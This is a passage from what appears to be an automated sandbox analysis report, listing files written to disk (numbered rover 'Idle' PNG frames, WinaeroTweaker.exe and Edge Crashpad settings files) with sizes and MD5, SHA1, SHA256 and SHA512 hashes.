4812b3215007efc588b7f1b1d6213afa4a76d5faf832a1f0f4a3fe50f70496f7

SHA512
5c870e281450614869d017af3e56c3f882e2d355b0e3976128907e71aafba3fc5ba3c4e14627d692cc8069024e5d23930a73952ca3b6444362a92177a857363d

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.004.png

Filesize
3KB

MD5
f47534e2e91e1ecaaf7eb3cf5c692605

SHA1
7c8878c2b57ffaf1532a5a8debf095e53b7598e2

SHA256
954738dfaa18029e3e722f000d65cd4230c04cabc902af4b943cddd0613559fc

SHA512
92c74604c469d76931f08ca3238d4c22f913e0e4b7b6bb11e2f6dc117b31ed3698f04622508c4ef4509ab146e1ca297c935f396a0f53084ca561672cf01ec5e4

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.005.png

Filesize
4KB

MD5
03d511bdb82e4f6302c1144acda67569

SHA1
4866ecc58092afd7bd756e530d4d404c6e5cb7b8

SHA256
211a1f0fb688cc25c40d6b53d3d560ff530416d86e232532a61cc30dabbd2ca7

SHA512
587da0a57799d7cf1d5ee0716d4c00edd02d6ba576571692da9160c64a7507837917f486c0f2d1b97799578d67f3618310421e733a262d286dd29274e33e2f2f

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.006.png

Filesize
3KB

MD5
2efdd2043acaaa7b5fdee6abd0d07a1c

SHA1
d9ee14afbcd393ae6c4aef0b6662b4fbd3703af5

SHA256
ea454f5ab78c879ef5c0426fbd79574a5113e23a8756475e27e417c4093079b7

SHA512
27dbdc951331cb7ce306326771c2373827b972f4310db9a70ad864dfa789c39281eca296e10bc1a79d471182babb6c3f7f135d1cf9fde7de790f224b43280e0d

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.007.png

Filesize
3KB

MD5
e85dbd413bc479ec8069aed045641a10

SHA1
1198065ef7d37c3e12dc4fdad50390f5686a09ac

SHA256
1b8574f84b4c49f5860409c304250917f6dbeccc750a2246b73c0c2b49a2eddd

SHA512
1962cc6efe48d66636376fa439ea23b224359e7404370b1898515f0057025ab98acef61e66cd2b7328d5835db2ead4a77b724c8b50f93337e6ab2cd5f596de69

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.008.png

Filesize
3KB

MD5
439567d7aa87eab3a6926d0f9f060439

SHA1
023c2121add6b66b7d87346ab930109e3708ef8f

SHA256
ea9505c901b67f30c03186f1ebd3b2753c6687251717d02aa2e0fdaff17b3e4f

SHA512
4a952738e17dd9f63da1054854c58f45441e3cbb88273fc1990a348c99eb3de2a105ecbe5f738f11f71d49ebef073f1a49f617ae74bc33627600072af27ccf45

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.009.png

Filesize
3KB

MD5
1858aef1339eb49d88ddfafa7c30833b

SHA1
e5dd108dbbd81a50a930e5938e772df48c897938

SHA256
f629e309187d460093ab0d18a0c4295b57df8764aedc2d360bf427336be6b6e4

SHA512
d0a614ff03775e93fff34469eac8812bc03b6343048b4c3ac995c3640e9a25c995f7a7748b4dffdab3853796c290d9027e77c06ce27eb89ca22b72fe86c99b5f

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.010.png

Filesize
3KB

MD5
caaaaf4297b6cd045d98662d010969a2

SHA1
6ae6fd6ea7e7d89a94fbb6320c6d1ea307c1626b

SHA256
85452b71a8e0752693af95bd7aa463a903b953f5a63007c675907b63380d1f3f

SHA512
7cd2c8dd11b31e252abd418572bb6ca0a38fdc28186fe7dea0365d71a708ce4d1cfe1d4efc518a366b1c9674bf5173eaa8c44c4e0f47c215ec727a20ec3aace8

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.011.png

Filesize
3KB

MD5
effa423993959efa7b7326081c730178

SHA1
670eb86d4a4b6bb10984d1dd67d3e7a06043100f

SHA256
9dcb4a3ba3560260fe55b569accef3b0734c64b9a3d3f9ac133bfcfd750fbb53

SHA512
e9ed38dd94789330a9720ea4a54742acef9c2ceb7dec751de323910f64ac124cc671ae94ee70cdcc481b0b01ea5e3368b989aa041ae6232957327a97c6e0e03f

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.012.png

Filesize
3KB

MD5
c45d768ff505ca41e4fba41a761e3d3a

SHA1
a0c715dd66728a367a16c2e950cb8407577b5a7f

SHA256
4ededc2033f874088938e7e5dc5ce079aa4f61190d604765e9377997861af300

SHA512
6f4194736650a8cc6922b14fbe76fbe3a11e8ff2fbcb425bcf949fc03dd3ef3fe18f01a6baa59275d1d9948444d0784a84e4b4a263fa03b26a4e12cce227ef2c

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.013.png

Filesize
3KB

MD5
99ef087fbdd404124c5ec349098c1829

SHA1
aaaaf3f74ca80e1e82c457084c3781be89eedef7

SHA256
063c21724ecf35d9e4f36b6f0703b29bdae12dc55dd55f1303179c91baaae202

SHA512
bdcfcd024fb4d4b87ebce51074e5d34092ab27226f0497797a637a98eac779c86f765e9bc299e961bdc984e79998281ebd98957de395c1c5d34f58a4c277b3a2

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.014.png

Filesize
3KB

MD5
d083400c4d4ed372a8cc58f3bd51fb49

SHA1
e617a1a8fc61774aa020d5747d4cc02c9589ab29

SHA256
aec2d3acf0eb98ced0e99bcc33400de665b0e7d20c44289d8fa7a3b15e466322

SHA512
d8012efadeded330fdf23b5bc401ff524a95c6031f1e1e6fcac73e67267bb04c7ddab21b47405aa68f29c0d2e24b427849ee97de9f1d08b5835fed435f0e2e2f

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.015.png

Filesize
3KB

MD5
832fea7c280114cde344a1eb05ac6e38

SHA1
b7f6b883a2ba4f9207307437647ec177baa6e033

SHA256
353521010652584ff1c8d014cd633b214884ab6e989a93fd376862aa49e92bce

SHA512
f143643cceaf9e3a5b2bd0fe101972fd9be3a050a504c94964a057a1207ab7cc4a484c0c9100d845eb67e3b853331fe68b853407584c020d8a618a019792beb3

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.016.png

Filesize
3KB

MD5
f6bc71acab3b5649ea7f6a80d307be98

SHA1
ba5ed99b86afac3e77b23c329bf0a4505e203ee6

SHA256
a8c905783760cd9fe436cecf9b3d41f737aedefe0389b5ae1a3621e5ad70ffbb

SHA512
d251fa010b87785e22817cb7d738677371637c7ce3ce52dd163f4e486e5a2a1a156c435cf2989a06519030b245abc1147257cfd2e7588d095861b6103e6319d1

Download Submit
C:\Program Files (x86)\rover\_5Idle\_5Idle.017.png

Filesize
3KB

MD5
8401c81a2786966921196322c7dc997b

SHA1
21bf190022bf9e5285ad33a1d9b9e8982dc6924b

SHA256
256d3f5fb7b1e693b39cdacdd3fcae49b960c6bf1c13c5722c446c0719023f12

SHA512
694046f1bfe9c761c203f03425d280b36510548dea09558dba0618289d3c3b72a66d019fc4349679331f77212aafb62342c912e54c883d5f8e383e88cf6f1a9d

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.001.png

Filesize
4KB

MD5
b00706960382815918c8ed9c2620be98

SHA1
687d41d0499a5b0f21f0c2480a305e4267775854

SHA256
00a8d4f366bb71d1d23e2bf08935e3321ea4552bf68b0e0eda475fa84bd5b1f4

SHA512
651944e3e7e560779810a6d7585da050b9e51c1e50c1a7aebfdda8a6f383e5f05b3304a53ae25a658cfbbae62d6cfb4f7b26166d50ed0227af71a9a7ae2d0947

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.002.png

Filesize
4KB

MD5
8143b3677c940c9a17cead5fc9152f7c

SHA1
f1ebe57d71a4af6a4909ebb239bbd131b5ec3577

SHA256
abe8caa8da0099dcc024a1993a117a7f73c66c6650df3c1430f09d7be19d27c0

SHA512
c0f7df7945e2626d164db1bbf11ad71a58462a5579716f43736475435a5da076f2cd868c85d6b587df4576b3d4aa9dcde4e53295589e0a554a349661f43fac7e

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.003.png

Filesize
4KB

MD5
f47b094e938bc3c67945d1a3591059f7

SHA1
7a4a9e7ff8344f6ea121c134b306c580bf8764f1

SHA256
f3e11eb38d48ab6572b68ed6dd387f081210bf49daee13653fb619f1af27a03e

SHA512
c22376cdf0fa47d7c9aab9c358b888d67d46fc84e3d479bf931d3d5b702881f19671ec562f7e6c5525e25e5bd8470c9a1dd55a671b9f96afe18de298188bbc12

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.004.png

Filesize
4KB

MD5
c1ad8b7c95808f4bd5088952fa081b78

SHA1
1eede17dc33e7be028486f64eb185021e9a58fab

SHA256
4d8af631170428eaf6ee72767a381e87935d5aead26b6a188fe8042a7628316c

SHA512
331581f48d5e44e7b79ea44ec3d87681830ddfc92c3ab49c66a2cfe0c46333cdfde014ead3e63d1e4f2d3c69edb76c3d390956b647642b378637b55a928b6af1

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.005.png

Filesize
4KB

MD5
310ea5ce731cb036506fe6d4652dc9d0

SHA1
39323884f9dcebf27a64d96d1f539cd73aad42cc

SHA256
2c0fe38c53562f1a915d1daeac11ae60f2c54e595817ea0a5c4a81bbe1341454

SHA512
d078b18330233229ca21e41e89ad139214cb8035ed681ac514c1458f25990c8c6ab0b3a7947715fea58ca549be0d18de74a33d4355b030143280aad210d32627

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.006.png

Filesize
4KB

MD5
71fdf5c9c2868f2ae00803e3766982da

SHA1
22a7625b8b3ab6d54357babf108f720b1b22f940

SHA256
4e7c68dbd0224cc83d8f03057138a09de8c119293c7c98cb4489f3a8ed30cc08

SHA512
a95f229ff6101807970f305e107748341c4c7ac858ded0da8b1de39467c522cf73553f34b9b3573feed71cb2cacd9098815c849c1817a6a0d274eed7df6f2708

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.007.png

Filesize
4KB

MD5
b89dea1aaafe105256de15f3262c9bb2

SHA1
ef7c8a2a454ed9ef554f713df761952fefbe6b22

SHA256
829b9cacf3ad245b195fb1a645ee3a467186095f13e444784e1452b4cad22f45

SHA512
ec196a33fff6017c13e328585961aa554e140f9c9df3bb8f0bea355adffb67bdd876cee896b5e6dfc1591e336779722ba78254a9b103d173b1bf074415bc6b84

Download Submit
C:\Program Files (x86)\rover\_6Idle\_6Idle.008.png

Filesize
4KB

MD5
4950813fe5f739aa5a6b951023218c88

SHA1
61133194dd98eb877794bee2d38966e142e6fc16

SHA256
1ff42478829ec190fabe6dd3b8b6ead5e1eae8d533e72c59cb6dbc071bfc868e

SHA512
cdf4fe8c605490d4cc020e0d9bfb92614f2bd12806b1472d960729f2bc0b0bbe76b91747b7debd77f53959c659cbc290795f1548fa90d7e71d944e9ffacb9b82

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.001.png

Filesize
3KB

MD5
c8bc903c2c7b9f685954a8eef5af9085

SHA1
6002bf9b7f1a4e1a0c4e51cf7ddcf8d3dafac6c5

SHA256
d932563e1866284b1ec359587a0a09446888073c08ffeb74e47cb9201cb82caa

SHA512
a80745e7db61c521d809dc2594edbf85cc68326ca97ec341b05fb0b9b7ef5424cd42d8eaf6d59f68d5e2509cb87743fd7f099c4e10876d2c5833c46f329285bd

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.002.png

Filesize
3KB

MD5
933b77e7d78c888ed83cbec57ec9af74

SHA1
bcbc2203a4527771364ba80abaca976d9dec6dcd

SHA256
b682f615bdee802bda24fad31289d5b2e499b95f9e34a6d73e484bb410370c95

SHA512
db6bfeff8eb57b9deadc50ee0f3b50900eacbd7942f02d6bf7085804e69118041936039ff5bfe770ba9d61c260a5bdfb0dfba94654cabc521640add31a50acb4

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.003.png

Filesize
3KB

MD5
6abacfd7cf98f988aa485817aa1a2867

SHA1
aa5fc9d904661268e846968cf2e0ca7231802d6d

SHA256
b44d0823c5f1d0d0dfd15cf71d0f69980e0344c97b1eb233d50f40fa8da34dde

SHA512
908a1904823f32dd41ae786eb6ec810b551043760a19d086596f3ea881faafd3151edee2d21408fcde633948acbb6735cabb10cdb0476247c7014d90da2fdd42

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.004.png

Filesize
4KB

MD5
0cd86ee33a81784f793d6e96c9bcc63e

SHA1
12757b47bcb94fa36c7d22f9fe53e7c413b459f5

SHA256
2f62410b43825bc12cd6ded7d8a7e5337cc0d4a27660950b3d9e604413cff756

SHA512
2526e383aaed211abaaa844529eecd66bc683127e6ac2e26b0b0958ea5f90064696030d255aa8de99ec17ae08fa1fafe1e019f368a811b569c4d20bdf4e8e863

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.005.png

Filesize
4KB

MD5
aee65bc6df4c8f4dc45cd203cfab8969

SHA1
8927eaeea46f1fe52ef290db809e17c518bb9317

SHA256
2ced4fc30d9a3f15edba34c94b0082cad1bb2a7d2a73310deb2378753ed68af5

SHA512
ba7e278d91f87d870603f742e6221d6c14a8c4bcd0abbb3abd20f0e88953d25f6d06558136c2dacffef878a5859f481d32bbd7d897bde450276c32cb79d81383

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.006.png

Filesize
3KB

MD5
ccfc1a07c0a02a65d6bb0a4d5084f383

SHA1
112f27aad26d4321022360a7e831099225f68c70

SHA256
1298564b3e7af43cc1198ecf5894a477bbc444dd3f4c08eaf9583528e6ab185c

SHA512
9ae9c8d1d63e0cd6dec20db94ecdb6c064ce5914566c05e6ce1c26b0fb861ef104eae7542f13e099740a29bc23420a05a10cabdcc579e6212c9f4108178d41ea

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.007.png

Filesize
3KB

MD5
d8fce6334d4b0173e3e04edecdfa8bf8

SHA1
79ac06e6e8307e7801e0555a73253eaac0f62e90

SHA256
2a552e3d154e627dbc75c620b7a3c9079eee343863be9add1cffffb4196e5763

SHA512
e4d0fcd2456d1bcb27f63eef2523d3b968041f2181730baa5c159e1215ef4253fc9bc762eb7412fa40aa3682bd7bdcd1dae47f66a114ae5b10ee0c7657e5c8c4

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.008.png

Filesize
4KB

MD5
8202eee8125946fd3fe9b9bdac6041a3

SHA1
f65284a69602a2364ef8aa1d53d1c9cd5c664058

SHA256
ba7da3be084abed034af32f708e074b0088bda3e0a021afd051f66507a0ad702

SHA512
59236a64020b0b0805cca07b1309050c36e6cf149da2915f5e4a99a71b6d508d029f5604fd9c0775511920aceef32e86c9100e40a1ed039ed7afef3f541acdc6

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.009.png

Filesize
4KB

MD5
b7096ce0bcaff56dfcefe080a17a0f80

SHA1
c1ebc67a00741121258a43be97d72759bf194d38

SHA256
efddfefba8cd24e23c1dcd20a201695f56e7ef37f228a6d77852f6b008412047

SHA512
4b064533557b6feb2f7016c31165d28bd74900a8fd06912817721c2c036314349b97f48c5bb914985881a309c1f79df8be004728f5793688b23dba3d871401a3

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.010.png

Filesize
3KB

MD5
1e9d596b3ca8fcc93fc8dfefa9e529a1

SHA1
dada3d87a617afdac6a961bfa780d859f70aa8ad

SHA256
bcb3a8e283bb9877aebe72e456f0c5de7e3a929fec75e05c1563cfdfe799f807

SHA512
46952a207171efff9727c68bb8b3b566bebfbfff08c19467614d1077476bf0f0b3842dd9c56fbcae7a6f15da740f6cbf4160282ab7d44c9ad91e3e61b34f7b7b

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.011.png

Filesize
3KB

MD5
5c3be185f9927d76df478b6af9f11034

SHA1
d5d0d258196308c4f100cf1b1cf06edbbef930af

SHA256
9c63402d1151cd016b945891c7845e16a87609e66737d1bd540130cea81349d7

SHA512
e214e9ef08040de4370174f9f9c7da9e99bff33ea3376c67c0205341b207dd4fb02b4c30dc69f45008719e1201db1781ebdac9c2a2b0818809e115daae533a8f

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.012.png

Filesize
3KB

MD5
2a0c90afbbeb9e973333efa6a1509dd1

SHA1
d199a4f6e5dfcc917e04e71406c0cf5044a89c39

SHA256
125590c987f6462b03d612ed71e27453dbe126f12d6f34df611a6026bce7673a

SHA512
5e6f8e09e24d2250d6ba03bda55b53ae17c615b51fb0753383ffd1f1b522a2da79675f843e580c57e10d12e0511df6c82fdef43458f7081df94dba79f06c88d0

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.013.png

Filesize
3KB

MD5
6de860bb85d30309f250fcabc72a8653

SHA1
76718eb62c72ae072b1c9cda5edb8a3bf9810ae1

SHA256
c6c8a68db523ed34d77424801b372d9b67b3f4cfe0b80bf2b79e75cb2fb0161a

SHA512
1cc323295931581ce1d42c70fee3c0d20833afb2f98735886d06a0605f68af84e802819655d02cc66fedc701af5398db62c490b11496a09a48a7a66d5e236d25

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.014.png

Filesize
3KB

MD5
d2d747bd5aab7fe58a36d206c299fbb3

SHA1
07248f8ef9f55d0f995f57c899948f30f622066a

SHA256
b794ec413faeeeebe5f72562ac5887035c2491ad4bfb558252f28418d7b075f2

SHA512
b9f034a81ca9760668d0fd1196ddb2337e952132146b54d944452bacaa31f27dca7d7d56b549238bffd87b986e80f528d97f5d8a42696256f0551fbaef546808

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.015.png

Filesize
3KB

MD5
5bb5cd3396effcc442f190ba350dc92f

SHA1
ce5c2d6af725b96aad5747293e37b13245398be2

SHA256
ff35def0f1fa5cc4b8498a3c57f1b0e1445bf231edebe21bd17ae5b44ffed0d4

SHA512
aeb918cd87e87fa8faf2ccee415eae2160f1df3877847f4f4f22398dd5248017020cc8abf2ff4656376dce9b6f415e2bcbecdf4755a42391937b495abcc96cf1

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.016.png

Filesize
3KB

MD5
c2e36bc2b45b9daa7de56fb7d99cc192

SHA1
373341f67601a174112306f907d14c1b49e7b074

SHA256
a4a6c3e750493c15553426619ff3d2f9c0503f1340c9c550ed1fc336c6d29410

SHA512
8b8576313def19a553368ee36bec283e39f53efb1583f338f8dc17aedcc9ddc54e6d12d4d9f32d3272a4222234f2a86bb213c221638d6acf02a5fdf71edc44a6

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.017.png

Filesize
3KB

MD5
2840c0551f721aa81f40a18fabe00c4c

SHA1
b6cb5b22c895ceba46895274139d86164a40d02c

SHA256
5fb4f0c106d382945810ef6057417a1f7f4041fffe6ac8b7c36eaf218be281ac

SHA512
6fcfc8a8d808148d970b38a308d31f8f6fa7656cf8d1b801f843e0aecb123973c0b69699b1f012886caa26389f1214ac126548bf34371f239a40a0088e4aea47

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.018.png

Filesize
3KB

MD5
49bbc50f88d1f15b974eb6e956838dc5

SHA1
c7d44cc5554a9077acd3379e0ef46c8eba1746a3

SHA256
26a043f5c3d1a3d83af38c8c338d9a0f7e794b1235f538056a1f51884c2660c4

SHA512
6de886a9aecb85f5721dbd9a5a49f7d65cd0734d36ce96117823d468e60148831f4584ab7bc3a5cfb93c32a3507d748826bbde19f14a18b4645a534175721adc

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.019.png

Filesize
3KB

MD5
aafdee13fe20e6e8f4d0185f37533c1f

SHA1
0c19ceac15b7c3c22b2b4932c1ae14f36fac2d7d

SHA256
2916ee9dfba90e34e99dd5573397de1ea0326a094e3aa66156e5fb0d95f0a002

SHA512
12f3f7e83ddd82c20ec3de2023391e1ccbc56dbd75e04d5592472899ddd1ef569ac31242fefc95047d8b4b9f4a66b0ad1f52f41eac6a6a22630be697b41bef14

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.020.png

Filesize
3KB

MD5
9792cb6db6e36d81e833f70dd70dec3f

SHA1
2e4fefa144887abf8ce4fcd65cfa09cdfca168fa

SHA256
ba9d3da5ac9e9782b53fbea1321d4402dc814cfc2c570e25d36518f715fe268f

SHA512
10858671e3cd853772b7fb941a01b417274e87080c3e00e6a039f0835189fb545a254abfae867ea7a40639a18ffef4972315269f99b47c92a28fb41f711726a8

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.021.png

Filesize
4KB

MD5
feababadb0bb362dd829cd9656c775f8

SHA1
ecdad983469c3a53da671792fb6b264c2f482800

SHA256
4caef0e41e1d42572917852c6a0afd19f2d19430ffca28e6a45b844b3d65054d

SHA512
d4e6e5bd32320335183f1f47e7d8498284fef9e1036412619c0d9707f4d90efed3e16d82127b20dda591f0310f005228a4a8da4ab852b9113868a8ee29911f5e

Download Submit
C:\Program Files (x86)\rover\_7Idle\_7Idle.022.png

Filesize
4KB

MD5
39bb5daa31bd80091e422956b523db86

SHA1
c9141962dabf59b2ee651d6353f62b046246224a

SHA256
e7d42bcc51cd6744508c75e5796a9e0febd4aa518d43c420ab06796857827515

SHA512
56153a9d5233a0d606542eb72c336d38b7b7607f3043602dd8e3eaffde77f5d3b4bc822a67795ced54fbbc8ad5e6538eb389478f87d68195750efc220d9eec21

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.001.png

Filesize
4KB

MD5
e1a360c15f56495fb5c2a8df24f9ed01

SHA1
77090bdabceaf775cc534eefbe37356e3cc18488

SHA256
cbae16a2d4c11106f85c4d50108fa3383a0c8cda2fbd891fdf6aaf973e24f525

SHA512
6e27904e9b9b8ea2a66d13015245e510327dbecca15685360c3f4ef13ec13b1b7da9be22bd7e5b1adcf5eb2d07918223b6e91ded110302e8d95871f56941b116

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.002.png

Filesize
4KB

MD5
7dd2b0223c885079a5117f301a0f232f

SHA1
31b7d78ebae785687e2a4542b738a63c958e111c

SHA256
56fc65a42eb0878529fe9a39a0ecdf2f21f9c7fee34aba77952dbf7aa5e0be9f

SHA512
44bace30ffaff3c64d32ab6c6004468694e05e769d8455fa97fb11189b842ff6d666dbfc883cf0ab70030f1bae3aaccd6c893c0ddf8f9c1021e843157030d6b9

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.003.png

Filesize
4KB

MD5
a2d4d2bccdde1db04539f27adb6146e6

SHA1
28afebafc6cf6d35c7b4351f4e344bc20138ba8e

SHA256
2ac60aaf72caec29c6f1b2085f7abe24bb468c50479766e2ba0449476415f1b6

SHA512
15da64ba0d3ef05e76617a064131d7da5832a41c8902793cca809b801bc5619d4df1f351e2b8b1bc8719dc29dd5397f6f4623bda32934446dff9df0672645278

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.004.png

Filesize
4KB

MD5
2310231a4b3750eccfe2c68d0bb434d4

SHA1
411c5b863f553d75bc5b9ab2aa02fa967efea977

SHA256
fdcda1f1b7970bd1c2cb02dc7ce469c2929553da2bab0783314d21e544392a0f

SHA512
930e3ead7c23352451a87a99cced72ab6b6035b959da281239967b8567119bff494d16d7b0a0923e680e7b16a162b49c1274b4580fc06c372a007f9187f19e82

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.005.png

Filesize
4KB

MD5
3cb58fa308fc3f024cb471621654ac92

SHA1
9b517a5888d2d0c1150a171a64382f6604770da9

SHA256
a725c14791696bd6718ac939b998f198fcecec8cf3ce42afda9948a9c45419fb

SHA512
80e9064b96124c67e054eeb8425066c23c36453eb10213ce43159f656feb91a9660a2062475bbc20dc9d5774f48b3f8a6cb5c28cdc9c947742a80660c7589d07

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.006.png

Filesize
4KB

MD5
6628f043475f6e491923bfacef09b799

SHA1
b0d942e39b4aca66165f67bb778d24abd045adc2

SHA256
cc50a9c33722e70695eabb1fc3453578f835f5b9bf97e39c2fcad334ac56a857

SHA512
a278dba72f9d1eb2bafbef9221f7e4cbda8e36f993064d46dd86563a2a1b54a871ef9cddf4296677e5ee9e96235d1d8f085a78430ff106ff1e0919a5910b769b

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.007.png

Filesize
4KB

MD5
ed1996022ad1c7c4ecfd407cb605fd2f

SHA1
6f4aecbb0403d53a61c0a7d35631cc8f4f1c543b

SHA256
0b4035bc4ddae98b1e391e246d496e522e00e18acc5931e151611824694e53c0

SHA512
ba25eabf3565d24fa482afc18110f8dd5366b220ced38a26e209418ef2c69433f85354ae5ff6528aea21a42757526f226870dbf26d75755019c6fd01aa2b2c0e

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.008.png

Filesize
4KB

MD5
2351b649f91856673f3175b10dc2aadd

SHA1
cfeac759cca4a26ef764b91576dd5eda457880c9

SHA256
bc92c679da98564a00245e4bd045bb85c0e7f5c3599ee30b067d4aad90ebe954

SHA512
39eb23f7e4f8e1515d1fa722f852f2bea528ac118c9fb9c54296cef5925335477232bc1669007200da1db07dd2be11e4243327c50b528737344dea52d44e860e

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.009.png

Filesize
4KB

MD5
b7b8b3d9a4a8a375252d5590ed0e80f5

SHA1
058d741a6ae6f565675982550dee1f7bf008bbf1

SHA256
aade6fb2764ca650305db5e6f63cec4efa89d89f5fd02d9ad84f6a1f6ee355c9

SHA512
b923fd7137d0321414f0234453f700166da1a2e61f29edc4695b9bca60c53194a35d4c6d2803483796ec007799a75e04541246981b4af8804d98c86baa42a153

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.010.png

Filesize
4KB

MD5
271dfbd8020e74e9ac8df66b283715dd

SHA1
cc3908127d63acaf26d84637345263531a4b6698

SHA256
d9456269313d518bef4362bd1db8388fb7103e142a2d13dbdb7c5e7913164c26

SHA512
7c9b907f7322a1529de6253d65169bf3137f6775cda170307f2d673e4a2595b68e13d161b978afa86ab5edf2a54ef090bd4fd57a58b2f8a60f9aea5ec4e7145b

Download Submit
C:\Program Files (x86)\rover\_8Idle\_8Idle.011.png

Filesize
4KB

MD5
eb332916552eecc3a997191642b6a78c

SHA1
b110faaef51287b5740d152f6af863498fd0991d

SHA256
79f94cc88ce06bad8899f0bed041599b73b15cd70c2b7e2ae8d356fcd2389940

SHA512
391c83fac92fb481f4ec5589a3f75fc1dfed2ebac1e3e1bbf309d3afc918f82e76e9f32e2053d2edea83d1c89fb25e76ac05cce254a68d39a89263df7bd1fb68

Download Submit
C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe

Filesize
2.9MB

MD5
6bb0ab3bcd076a01605f291b23ac11ba

SHA1
c486e244a5458cb759b35c12b342a33230b19cdf

SHA256
959dafbfab08f5b96d806d4ad80e4c3360759c264d3028e35483a73a89aa1908

SHA512
d1123feb97fbf1593ce1df687b793a41f398c9a00437e6d40331ad63b35fc7706db32a0c6f0504cff72ea2c60775b14f4c0d5a8955988048bed5ba61fa007621

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
612a6c4247ef652299b376221c984213

SHA1
d306f3b16bde39708aa862aee372345feb559750

SHA256
9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a

SHA512
34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
56641592f6e69f5f5fb06f2319384490

SHA1
6a86be42e2c6d26b7830ad9f4e2627995fd91069

SHA256
02d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455

SHA512
c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5d37d5bcd52b5d686df1f6411afd6826

SHA1
ce72c096c0f08955ad909e7158a0f1aff48e5526

SHA256
ce357e59b4850d5feca31c050c8b7bd0b55223323664010fa6ebeaa7fa895030

SHA512
328185a01a62efb49a4af0163e2f4280336869a3dc5d17fa6d2bf6c96cf3b92c37577f6aab80486a5bb8b7c4560c831afb5c18ab5057fc42ad2ec6d150cc3338

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e5d8a214731323907ac6b9658e000efc

SHA1
99384e17dc54577b17928713d007bbc7bfce4994

SHA256
f39234235fb9c72cfe79000eb39071cfac713368d901008e09fe68e2108ad7d2

SHA512
0dc172f6da45de9b0d2af85830b66378beba92132d62efd865843d8ee28b8d38f26682975dc4358b396734e55f92580cb1663dd0c10f04ece6573a7ec4b5b138

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
69d1fbb29b41c0dc67740099d731fab1

SHA1
9cc5d36283f9dfd605b18de2ea6ee486275c1a65

SHA256
56d9ec5a89837743c031b502b91306818a1aecd955d7254796a4a1319b1ca49a

SHA512
7a64acf9f334b2d6b14505b98d57e6ff6d1cfac6ee329ea7d0ce6f9f7141d8a172d3a4b32d92aecf3ed0345de15d4bf5255111ea1bf7e629909eb4cd943a3723

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a337b9ff8238819a008f89eefbd30362

SHA1
997ca78a76cbd5d40ccdd0687f68dc229aab0125

SHA256
4e206278f0e291cf7468608157fa6eb93424a9e95f32fbd2f5280831e25df1e1

SHA512
